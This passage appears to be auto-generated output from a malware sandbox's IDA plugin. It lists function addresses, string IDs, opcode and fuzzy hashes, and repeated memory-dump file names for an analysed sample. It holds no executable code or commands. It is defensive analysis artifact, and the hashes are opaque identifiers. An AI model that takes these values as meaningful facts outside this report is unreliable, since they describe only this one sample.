                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H$Ex$OO$|U
                                                                                          • API String ID: 0-876263540
                                                                                          • Opcode ID: ca27d8ed517486100a858d5ff282827b6ef50453556be1ffc9d14e0eadbc771f
                                                                                          • Instruction ID: 929a382fe256eebb4974f25beae353654bc3aea1e96556de862365b49ceb536e
                                                                                          • Opcode Fuzzy Hash: ca27d8ed517486100a858d5ff282827b6ef50453556be1ffc9d14e0eadbc771f
                                                                                          • Instruction Fuzzy Hash: 23F11134200B00DFE3649F6AC9D0B3B77A2FB89324F549D2ED59647AA1D375E842CB58
                                                                                          Function 004B35F0 Relevance: 4.6, Strings: 3, Instructions: 834COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: bBK$r:K$rBK
                                                                                          • API String ID: 0-1926890919
                                                                                          • Opcode ID: 99acde563aafeb2a83cdb9591b8b3145249aa1b3c155fbfd69ce191e88dd4fa7
                                                                                          • Instruction ID: 7836e82ea3d4c55db36c9d2550849591623720eb01607a2a71cb242137b8690a
                                                                                          • Opcode Fuzzy Hash: 99acde563aafeb2a83cdb9591b8b3145249aa1b3c155fbfd69ce191e88dd4fa7
                                                                                          • Instruction Fuzzy Hash: 8C421132A08211CFCB18CF69E8A02AAB7F1FBC9315F09857DE58A97351D7389D41CB95
                                                                                          Function 004B3740 Relevance: 4.5, Strings: 3, Instructions: 750COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: bBK$r:K$rBK
                                                                                          • API String ID: 0-1926890919
                                                                                          • Opcode ID: 257d4ec93166255252129c0e3628eabcb714daf4257ca229c96ce83c2c889fd7
                                                                                          • Instruction ID: daa896bc7e0957c40f8d3ed22ae1357aeea8eabcc457b21e48c6ba8d0a48dde2
                                                                                          • Opcode Fuzzy Hash: 257d4ec93166255252129c0e3628eabcb714daf4257ca229c96ce83c2c889fd7
                                                                                          • Instruction Fuzzy Hash: 0232F232A08211CFCB08CF69E8A06AAB7F1FBC9315F09857DE58A97351D7389901CB95
                                                                                          Function 004B39C0 Relevance: 4.4, Strings: 3, Instructions: 616COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: bBK$r:K$rBK
                                                                                          • API String ID: 0-1926890919
                                                                                          • Opcode ID: e0fd8b4d9f9f0ab6a9fc8bc4fd59e74c74dc671d7d549bf55e265e99bfc2fa62
                                                                                          • Instruction ID: 97fab5f6b0061437fe186354225e76616a72a686cbcb05cd44fd9bf63a41ec70
                                                                                          • Opcode Fuzzy Hash: e0fd8b4d9f9f0ab6a9fc8bc4fd59e74c74dc671d7d549bf55e265e99bfc2fa62
                                                                                          • Instruction Fuzzy Hash: 8912E331A08251CFCB08CF69E8A06AAB7F1FFC9314F19897DE58697351D734A902CB95
                                                                                          Function 004B2FB0 Relevance: 4.2, Strings: 3, Instructions: 492COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %*+($InA>$P
                                                                                          • API String ID: 0-1283304554
                                                                                          • Opcode ID: 8b9946db02c34fee48840aefaa4ee783b5b1dd9dae3c4186a97746b2da2cc735
                                                                                          • Instruction ID: 902facc90f7df1a6e13ba3e6b746531f78e10bf9bd5cf4bd9381d197db2412d1
                                                                                          • Opcode Fuzzy Hash: 8b9946db02c34fee48840aefaa4ee783b5b1dd9dae3c4186a97746b2da2cc735
                                                                                          • Instruction Fuzzy Hash: 3CF136726083648FC329CE2998507AFB7E1EBC5314F15862DE9A99B3D1CB34C906C7D6
                                                                                          Function 004AC7A0 Relevance: 4.2, Strings: 3, Instructions: 441COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: :$Zk6i$ho
                                                                                          • API String ID: 0-3802070491
                                                                                          • Opcode ID: 444afe6e9a03c5d874e1757eb17cf1bf2b963da18f6170bae937a4cb65129176
                                                                                          • Instruction ID: 7cf58cbb676ca5d779f42dcc69f6cd63d9449d0fae66abc51c76e4341eff89d6
                                                                                          • Opcode Fuzzy Hash: 444afe6e9a03c5d874e1757eb17cf1bf2b963da18f6170bae937a4cb65129176
                                                                                          • Instruction Fuzzy Hash: 71D11436A18312CBC7189F38E89126673E2FF9A351F09C9BDD48687290F379C845C759
                                                                                          Function 00478460 Relevance: 4.2, Strings: 3, Instructions: 420COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
